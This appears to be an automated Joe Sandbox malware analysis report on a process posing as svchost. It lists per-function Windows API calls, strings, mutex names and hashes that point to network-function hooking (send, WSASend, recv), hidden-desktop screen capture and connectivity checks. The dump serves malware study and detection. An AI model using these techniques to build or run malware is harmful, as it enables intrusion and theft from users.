HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02D28167
HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02D28175
lstrcpyA.KERNEL32(00000000,fuck), ref: 02D2817F

Part of subcall function 02D34AF0: IsNetworkAlive.SENSAPI(02D26BEE,00000000), ref: 02D34B03
Part of subcall function 02D34AF0: IsUserAnAdmin.SHELL32 ref: 02D34B11
Part of subcall function 02D34AF0: DnsFlushResolverCache.DNSAPI ref: 02D34B1B
Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B38
Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02D34B57
Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D34B70
Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34B83
Part of subcall function 02D34AF0: memset.MSVCRT ref: 02D34B9C
Part of subcall function 02D34AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02D34BB5
Part of subcall function 02D34AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D34BC8
Part of subcall function 02D34AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D34BD5

WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02D28222
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02D28231
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02D28260
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2826F
ReleaseMutex.KERNEL32(00000000), ref: 02D2827D
SetEvent.KERNEL32(00000000), ref: 02D28286
Sleep.KERNEL32(00002710,?,00000000), ref: 02D282CC

Strings

fuck, xrefs: 02D28177
SYSTEM!528110!3DEABDE9, xrefs: 02D28106

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
String ID: SYSTEM!528110!3DEABDE9$fuck
API String ID: 2939156510-2479639858
Opcode ID: 5113d8f458fdba42faa657b1c4a7b6b61cd12f607ed521e8a2cb806f81e99f6e
Instruction ID: 492982fc1f797cc4d00738f8713beb6b568350d47354e00dc4ac0565e6b4a693
Opcode Fuzzy Hash: 5113d8f458fdba42faa657b1c4a7b6b61cd12f607ed521e8a2cb806f81e99f6e
Instruction Fuzzy Hash: C051FF759403209FD7109F64E94CFA63BE9EF58318F158AA9E9448B391C775AC18CF70

Function 02D3E080 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc077), ref: 02D3E0B0
PathAddBackslashA.SHLWAPI(5e8dc077), ref: 02D3E0ED
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3E102
GetLastError.KERNEL32 ref: 02D3E10C
IsUserAnAdmin.SHELL32 ref: 02D3E114
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3E125
SetLastError.KERNEL32(00000000), ref: 02D3E12C
SetCurrentDirectoryA.KERNEL32(?), ref: 02D3E139
PathAddBackslashA.SHLWAPI(5e8dc077,?,?), ref: 02D3E161
GetProcessHeap.KERNEL32(00000000,?,5e8dc077,02D6A2A8), ref: 02D3E17F
HeapValidate.KERNEL32(00000000), ref: 02D3E182
GetProcessHeap.KERNEL32(00000000,?), ref: 02D3E18F
HeapFree.KERNEL32(00000000), ref: 02D3E192

Strings

5e8dc077, xrefs: 02D3E0AB, 02D3E0B2, 02D3E0E6, 02D3E0EF, 02D3E15C, 02D3E168
cc.txt, xrefs: 02D3E152

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HeapPath$Backslash$DirectoryErrorLastProcess$AdminCreateCurrentFolderFreeMakeSystemUserValidate
String ID: 5e8dc077$cc.txt
API String ID: 2491352018-4205126158
Opcode ID: cf2539da69b198d66e04edb60397aa207b92219e109a3403f1f3b29d84852baf
Instruction ID: a69aa4cf80f739da668847bc76405ab4bbc7d8845dc8708dacb5bc1a2df59182
Opcode Fuzzy Hash: cf2539da69b198d66e04edb60397aa207b92219e109a3403f1f3b29d84852baf
Instruction Fuzzy Hash: 6C31FF31A40315ABE721AB74AC5CBAB7BA8EF49B01F544950F986D7340EA74DC84CBB0

Function 02D420F0 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 67sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D4211C
ReleaseMutex.KERNEL32(00000000), ref: 02D4212D
GetHandleInformation.KERNEL32(00000000,?), ref: 02D42141
CloseHandle.KERNEL32(00000000), ref: 02D4214F
CreateThread.KERNEL32(00000000,00000000,02D41FA0,00000000,00000000,00000000), ref: 02D42164
Sleep.KERNEL32(00009C40), ref: 02D42175
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4217A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D4218E
CloseHandle.KERNEL32(00000000), ref: 02D4219C
PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D421A7
Sleep.KERNEL32(00009C40,5e8dc4c1,RAIFF), ref: 02D421C1
Sleep.KERNEL32(00000064), ref: 02D421CA

Strings

5e8dc4c1, xrefs: 02D421A2, 02D421B2
RAIFF, xrefs: 02D421AD
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D42110

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$RAIFF
API String ID: 505831200-115387483
Opcode ID: a3280fa361de3f6f68b68c07cb1b94354b859147c1dee03579bd76664a29768b
Instruction ID: ee62babe3faf3df0befca2e136b0b9d427503bd1d15d19e3274e8c9f0b2492bf
Opcode Fuzzy Hash: a3280fa361de3f6f68b68c07cb1b94354b859147c1dee03579bd76664a29768b
Instruction Fuzzy Hash: D311B131A88711BBF21157A0AC0EF1A3B985F48B55F544504FE46A13C0DFF4AD548AB6

Function 02D2A000 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON

Download Yara Rule

APIs

GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02D2A00E

Part of subcall function 02D2DFB0: GetWindowLongA.USER32(75C0BCB0,000000F0), ref: 02D2DFCB
Part of subcall function 02D2DFB0: GetLastActivePopup.USER32(75C0BCB0), ref: 02D2DFD9
Part of subcall function 02D2DFB0: GetWindow.USER32(00000000,00000005), ref: 02D2DFF3
Part of subcall function 02D2DFB0: GetWindow.USER32(00000000), ref: 02D2DFF6
Part of subcall function 02D2DFB0: GetWindowInfo.USER32(00000000,?), ref: 02D2E00C
Part of subcall function 02D2DFB0: GetWindow.USER32(00000000,00000004), ref: 02D2E015
Part of subcall function 02D2DFB0: GetWindow.USER32(00000000,00000003), ref: 02D2E04E

SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02D2A04F
GetAncestor.USER32(00000000,00000002,00000000), ref: 02D2A0D5
SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02D2A0FC
PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02D2A141
PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02D2A195

Part of subcall function 02D29EB0: GetTickCount.KERNEL32 ref: 02D29F3A
Part of subcall function 02D29EB0: GetClassLongA.USER32(00000000,000000E6), ref: 02D29F8D

PostMessageA.USER32(00000000,00000112,?,?), ref: 02D2A1FE
PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02D2A229
PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02D2A2A5
GetSystemMenu.USER32(00000000,00000000), ref: 02D2A2C4
GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02D2A2E8
GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2A353
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02D2A366
PostMessageA.USER32(?,?,00000001,00000000), ref: 02D2A389
PostMessageA.USER32(?,?,00000002,00000000), ref: 02D2A3AB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02D2A3E3
GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2A40D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
String ID:
API String ID: 590198697-0
Opcode ID: f1944ad3460459ff5173cb731a2ceeceea119a074248d91a37e079d26b2c3ae1
Instruction ID: 3c84a6236994cef63acd24a481fac1f06c847b843427cfbdaf2fc87e0a34c30d
Opcode Fuzzy Hash: f1944ad3460459ff5173cb731a2ceeceea119a074248d91a37e079d26b2c3ae1
Instruction Fuzzy Hash: CBB17832F402345AEB309A58E889FBE7368DB6572DF20802AFD45D7381C7699C59C7B1

Function 02D29050 Relevance: 25.6, APIs: 17, Instructions: 96windowsynchronizationsleepCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?), ref: 02D29062

Part of subcall function 02D28C30: SelectObject.GDI32(00000000,00000000), ref: 02D28C4A
Part of subcall function 02D28C30: DeleteObject.GDI32(00000000), ref: 02D28C59
Part of subcall function 02D28C30: DeleteDC.GDI32(00000000), ref: 02D28C67
Part of subcall function 02D28C30: SelectObject.GDI32(?,00000000), ref: 02D28C77
Part of subcall function 02D28C30: DeleteObject.GDI32(00000000), ref: 02D28C7F
Part of subcall function 02D28C30: DeleteDC.GDI32(?), ref: 02D28C88
Part of subcall function 02D28C30: GetDC.USER32(00000000), ref: 02D28C8C
Part of subcall function 02D28C30: CreateCompatibleDC.GDI32(00000000), ref: 02D28C9B
Part of subcall function 02D28C30: CreateCompatibleDC.GDI32(00000000), ref: 02D28CA3
Part of subcall function 02D28C30: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D28CC4
Part of subcall function 02D28C30: SelectObject.GDI32(?,00000000), ref: 02D28CD3
Part of subcall function 02D28C30: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D28CEE
Part of subcall function 02D28C30: SelectObject.GDI32(00000000,00000000), ref: 02D28D0D
Part of subcall function 02D28C30: ReleaseDC.USER32(00000000,00000000), ref: 02D28D1C

WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02D2907F
GetTopWindow.USER32(00000000), ref: 02D29092
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D290A9
GetWindow.USER32(00000000,00000005), ref: 02D290C9
GetWindow.USER32(00000000), ref: 02D290CC
WindowFromPoint.USER32(?,?,00000000), ref: 02D290E0
SendMessageA.USER32(00000000,?,00000005,00000000), ref: 02D29103
GetIconInfo.USER32(?,?), ref: 02D2910B
DeleteObject.GDI32(?), ref: 02D29116
DeleteObject.GDI32(?), ref: 02D29121
DrawIcon.USER32(00000000,00000000,?,?), ref: 02D29143
DestroyIcon.USER32(?,?,?,00000000), ref: 02D2914A
SendMessageA.USER32(00000000,?,00000005,?), ref: 02D2915B
ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 02D29163
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 02D29170
Sleep.KERNEL32(00000032), ref: 02D2917D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Object$Delete$CompatibleCreateSelectWindow$Icon$BitmapMessageReleaseSendSingleWait$DesktopDestroyDrawEventFromInfoMutexPointSleepThread
String ID:
API String ID: 1852974301-0
Opcode ID: 4625a5e8462656179c326cab796b6a11aa1cf8583c41d127af049c25c0151727
Instruction ID: a206ff6b65fcd50d251020d58cc6f61977bec45d6269e6c08f4fe71d821679d8
Opcode Fuzzy Hash: 4625a5e8462656179c326cab796b6a11aa1cf8583c41d127af049c25c0151727
Instruction Fuzzy Hash: 27314A79980211AFC310DB64F98CE6B37B9EB98B15B548A08F90687380DB74EC65CB71

Function 02D430B0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 67sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02D430DC
ReleaseMutex.KERNEL32(00000000), ref: 02D430ED
GetHandleInformation.KERNEL32(00000000,?), ref: 02D43101
CloseHandle.KERNEL32(00000000), ref: 02D4310F
CreateThread.KERNEL32(00000000,00000000,02D42F60,00000000,00000000,00000000), ref: 02D43124
Sleep.KERNEL32(00009C40), ref: 02D43135
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4313A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D4314E
CloseHandle.KERNEL32(00000000), ref: 02D4315C
PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D43167
Sleep.KERNEL32(00009C40,02D7CF94,RSTYLE), ref: 02D43181
Sleep.KERNEL32(00000064), ref: 02D4318A

Strings

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D430D0
RSTYLE, xrefs: 02D4316D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$RSTYLE
API String ID: 505831200-1477618600
Opcode ID: e8437f4e58ba90a8990a1949ff3057fef4e69deefff80be59dae606b5e128ca8
Instruction ID: 923803d1caba37adba3bd537ed4f33f79dc9e1b39f6a6e930bd98c953ad67086
Opcode Fuzzy Hash: e8437f4e58ba90a8990a1949ff3057fef4e69deefff80be59dae606b5e128ca8
Instruction Fuzzy Hash: F411D330A897027BE26057A8AC0EF1A37989F04B14F744644F946A13C0DFE4AD15CABA

Function 02D392D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,74DEF550,74DEDF10,02D3549B), ref: 02D392E1
GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02D392F3

Part of subcall function 02D3A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
Part of subcall function 02D3A040: memcpy.MSVCRT ref: 02D3A0A0
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A

LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02D39312
GetProcAddress.KERNEL32(00000000,send), ref: 02D39320
GetProcAddress.KERNEL32(00000000,WSASend), ref: 02D3933C
GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02D39358
GetProcAddress.KERNEL32(00000000,recv), ref: 02D39374

Strings

recv, xrefs: 02D3936E
advapi32.dll, xrefs: 02D392DC
WSARecv, xrefs: 02D39352
WSASend, xrefs: 02D39336
send, xrefs: 02D3931A
CryptEncrypt, xrefs: 02D392ED
ws2_32.dll, xrefs: 02D3930D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
API String ID: 1216545827-2206184491
Opcode ID: 6e775ffd8a544ce5baa02cbbed1d4df8839b7637a08362f9e1c7fe752af03dcb
Instruction ID: 0d5733379982dc97eb570328f7c1286bb77ebc9d4b231657e8d6099bca204a70
Opcode Fuzzy Hash: 6e775ffd8a544ce5baa02cbbed1d4df8839b7637a08362f9e1c7fe752af03dcb
Instruction Fuzzy Hash: 3A01EDA1B8131236F9323675FD2AF9A074D6B45E44F250520B542F3388DAECEC0D8D78

Function 02D42108 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D4211C
ReleaseMutex.KERNEL32(00000000), ref: 02D4212D
GetHandleInformation.KERNEL32(00000000,?), ref: 02D42141
CloseHandle.KERNEL32(00000000), ref: 02D4214F
CreateThread.KERNEL32(00000000,00000000,02D41FA0,00000000,00000000,00000000), ref: 02D42164
Sleep.KERNEL32(00009C40), ref: 02D42175
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4217A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D4218E
CloseHandle.KERNEL32(00000000), ref: 02D4219C
PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D421A7
Sleep.KERNEL32(00009C40,5e8dc4c1,RAIFF), ref: 02D421C1
Sleep.KERNEL32(00000064), ref: 02D421CA

Strings

5e8dc4c1, xrefs: 02D421A2, 02D421B2
RAIFF, xrefs: 02D421AD
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D42110

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$RAIFF
API String ID: 505831200-115387483
Opcode ID: 5d5af276196dd8f24db303944955df03741e68359e35fde78185dd42b01765e3
Instruction ID: fb864656ec447089fda7fabd5d8772afeb74ac8925ee54f018fc5281bf738779
Opcode Fuzzy Hash: 5d5af276196dd8f24db303944955df03741e68359e35fde78185dd42b01765e3
Instruction Fuzzy Hash: 6211CE30A88312BFF32157A0AC0EF1A3B949F48B55F144904FE46A13C0DFF49C488AB6

Function 004013C0 Relevance: 24.1, APIs: 16, Instructions: 133memoryfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
HeapAlloc.KERNEL32(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
memset.MSVCRT ref: 0040143D
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
HeapValidate.KERNEL32(00000000), ref: 004014A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
HeapFree.KERNEL32(00000000), ref: 004014B4
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014D4
CloseHandle.KERNEL32(00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014E5
IsBadWritePtr.KERNEL32(?,00000004,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 004014F5

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
String ID:
API String ID: 132362422-0
Opcode ID: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction ID: 1e88e17013718af7825f0840a72b71bc919ec8abe2a586386afbdd05d1fe9019
Opcode Fuzzy Hash: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction Fuzzy Hash: C04156B1900214BBE7219FE59D89FAFBB7CEB84B11F104125FB04B72D0D774594487A8

Function 02D302A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197memorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 02D2FF00: memset.MSVCRT ref: 02D2FF54
Part of subcall function 02D2FF00: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02D2FF6C
Part of subcall function 02D2FF00: HeapValidate.KERNEL32(00000000), ref: 02D2FF6F
Part of subcall function 02D2FF00: GetProcessHeap.KERNEL32(00000000,?), ref: 02D2FF7C
Part of subcall function 02D2FF00: HeapFree.KERNEL32(00000000), ref: 02D2FF7F
Part of subcall function 02D2FF00: InternetQueryOptionA.WININET(?,00000022,00000000,-02D6FAE4), ref: 02D2FF9C
Part of subcall function 02D2FF00: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02D2FFB9
Part of subcall function 02D2FF00: HeapAlloc.KERNEL32(00000000), ref: 02D2FFC0
Part of subcall function 02D2FF00: memset.MSVCRT ref: 02D2FFD0

ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D302E2
InternetSetStatusCallback.WININET(?,02D30260), ref: 02D302F6
GetProcessHeap.KERNEL32(00000008,00001010,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?), ref: 02D30307
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D3030E
memset.MSVCRT ref: 02D30321
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D3035B
memcpy.MSVCRT ref: 02D303A7
InternetSetStatusCallback.WININET(?,0000000100000000), ref: 02D303D5
SetLastError.KERNEL32(00002EE4,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D30431

Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D3016B
Part of subcall function 02D30140: HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3016E
Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D3017B
Part of subcall function 02D30140: HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3017E
Part of subcall function 02D30140: GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02D3043D,00000001), ref: 02D30197
Part of subcall function 02D30140: CloseHandle.KERNEL32(?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301A8
Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301B8
Part of subcall function 02D30140: HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301BB
Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301C8
Part of subcall function 02D30140: HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301CB
Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301DB
Part of subcall function 02D30140: HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301DE
Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301EB
Part of subcall function 02D30140: HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301EE

IsBadReadPtr.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?), ref: 02D3046A
IsBadReadPtr.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?), ref: 02D3047E
memcpy.MSVCRT ref: 02D30493

Strings

(, xrefs: 02D302EE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate$Internetmemset$AllocCallbackErrorHandleLastReadStatusmemcpy$CloseEventInformationOptionQueryReset
String ID: (
API String ID: 2621060597-3887548279
Opcode ID: c68aba6c1d5c7b04cf20f1ebb734f75b46f8a37a606f23485910d2b3bdc7d4fa
Instruction ID: 583a033336a64ba22a22010036a2d04798a92821b12c07584e7026868d3ba931
Opcode Fuzzy Hash: c68aba6c1d5c7b04cf20f1ebb734f75b46f8a37a606f23485910d2b3bdc7d4fa
Instruction Fuzzy Hash: 7F61AD71604606AFD711DF64D888F6AB3A9FF48715F004A28FA888B740D774ED55CBE1

Function 02D430C8 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02D430DC
ReleaseMutex.KERNEL32(00000000), ref: 02D430ED
